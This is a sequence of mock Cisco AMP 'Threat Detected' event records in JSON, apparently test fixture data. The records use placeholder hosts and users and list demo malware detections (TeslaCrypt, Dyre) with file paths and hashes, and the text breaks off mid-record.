+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":821000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261640","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261639","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261638","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":680000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261637","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":665000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261636","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":509000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261635","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259028591575000,"timestamp":1610705845,"timestamp_nanoseconds":984000000,"date":"2021-01-15T10:17:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259028591575130","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251439135752000,"timestamp":1610705841,"timestamp_nanoseconds":455000000,"date":"2021-01-15T10:17:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251439135752194","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258981346935000,"timestamp":1610705834,"timestamp_nanoseconds":346000000,"date":"2021-01-15T10:17:14+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258981346934873","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258929807327000,"timestamp":1610705822,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:02+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258929807327320","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":470000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542427","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":112000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":71000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542425","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":532000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537367","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":454000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667841684537366","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":80000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537365","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258118058508000,"timestamp":1610705633,"timestamp_nanoseconds":636000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258118058508361","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667837389570000,"timestamp":1610705633,"timestamp_nanoseconds":689000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667837389570068","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258066518901000,"timestamp":1610705621,"timestamp_nanoseconds":608000000,"date":"2021-01-15T10:13:41+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258066518900808","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258014979293000,"timestamp":1610705609,"timestamp_nanoseconds":581000000,"date":"2021-01-15T10:13:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258014979293255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257963439686000,"timestamp":1610705597,"timestamp_nanoseconds":569000000,"date":"2021-01-15T10:13:17+00:00","event_type":"Threat 